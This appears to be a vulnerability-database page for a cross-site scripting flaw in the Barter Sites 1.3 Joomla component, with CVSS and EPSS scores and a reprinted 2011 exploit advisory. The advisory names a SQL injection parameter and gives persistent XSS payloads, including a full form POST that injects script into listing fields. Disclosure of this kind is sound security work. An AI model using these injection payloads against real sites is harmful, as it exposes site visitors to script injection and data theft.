CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Multiple cross-site scripting (XSS) vulnerabilities in the com_listing component in Barter Sites component 1.3 for Joomla! allow remote authenticated users to inject arbitrary web script or HTML via the (1) listing_title, (2) description, (3) homeurl (aka Website Address), (4) paystring (aka Payment types accepted), (5) sell_price, (6) shipping_cost, and (7) quantity parameters to index.php.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
3.5
AV:N/AC:M/Au:S/C:N/I:P/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.06%
–
–
2022-02-13
–
–
1.06%
–
–
2022-04-03
–
–
1.06%
–
–
2022-05-01
–
–
1.06%
–
–
2022-07-17
–
–
1.06%
–
–
2022-10-23
–
–
1.06%
–
–
2023-02-26
–
–
1.06%
–
–
2023-03-12
–
–
–
0.09%
–
2023-10-08
–
–
–
0.09%
–
2023-12-03
–
–
–
0.09%
–
2023-12-17
–
–
–
0.09%
–
2024-01-14
–
–
–
0.09%
–
2024-01-21
–
–
–
0.09%
–
2024-02-11
–
–
–
0.09%
–
2024-02-25
–
–
–
0.09%
–
2024-04-21
–
–
–
0.09%
–
2024-06-02
–
–
–
0.09%
–
2024-06-23
–
–
–
0.09%
–
2024-08-04
–
–
–
0.09%
–
2024-08-11
–
–
–
0.09%
–
2024-09-22
–
–
–
0.09%
–
2024-11-24
–
–
–
0.09%
–
2024-12-22
–
–
–
0.09%
–
2025-01-19
–
–
–
0.09%
–
2025-01-19
–
–
–
0.09%
–
2025-03-18
–
–
–
–
0.23%
2025-03-30
–
–
–
–
0.23%
2025-03-30
–
–
–
–
0.23,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2011-10-28 22h00 +00:00 Author : Chris Russell EDB Verified : Yes
####################################################################################
Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities
####################################################################################
Release Date Bug. 28-Oct-2011
Date Added. 01-Oct-2011
Vendor Notification Date. Never
Product. Barter Sites
Platform. Joomla
Affected versions. 1.3
Type. Commercial
Price. $99
Attack Vector. Sql Injection & Persistent XSS
Solution Status. unpublished
CVE reference. Not yet assigned
Download. www.barter-sites.com/content/getStarted
I. BACKGROUND
The Barter Sites extension is for operating a trade group.
Members post listings in the barter directory on your site,
send each other offers and messages, negotiate, and 'pay'
with either direct trade or with your own private digital
currency called trade credits. You can even issue lines of
credit.
Admin has the option to earn commissions on trade credit
transfers and can run transactions for the members, serving
as a barter broker.
Features Include:
* HTML Listings
* Barter Wish-list
* Direct Trade Offers
* Virtual Private Currency
* Trade Credit Transfers
* Admin Broker/Transfer
* Generate Invoices
* Paypal Commissions
* Member Reputations
* Private Messaging
* and more!
II. DESCRIPTION
Two vulnerabilities discovered
- Category_id Parameter SQL injection
- XSS in several places
III. EXPLOITATION
*INJECTION SQL
parameter [category_id]:
/index.php?option=com_listing&task=browse&category_id=1[SQL]
[SQL]=Injection Sql
*Persistent XSS main
Register->> Login ---> barter>Post: or /index.php?option=com_listing&task=post&Itemid=2
Listing Title: <IMG """><SCRIPT>alert("XSS")</SCRIPT>
selection category.
XSS look at: barter>selection category
---->To view the xss is not necessary to be registered
*Persistent XSS side
In the form of the Post, you can insert xss in all settings:
-Website Address
-Payment types accepted
-Sell Price
-Shipping Cost
-Quantity
all can be inserted into the header, but for Facilides directly on the form
all: <IMG """><SCRIPT>alert("XSS")</SCRIPT>
*Persistent XSS in pictures
If you prefer pictures to insert in the xss edit header values as follows:
Get:/index.php?option=com_listing&task=listingsave
Post:
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="listing_title"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="description"\r\n
\r\n
<p><IMG """><SCRIPT>alert("XSS")</SCRIPT></p>\r\n <-----------------------------------click here
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="homeurl"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="category_id"\r\n
\r\n
34\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="paystring"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="sell_price"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="shipping_cost"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="quantity"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="submit"\r\n
\r\n
Submit\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="listing_id"\r\n
\r\n
\r\n
-----------------------------106542362324353--\r\n
Discovered by.
Chris Russell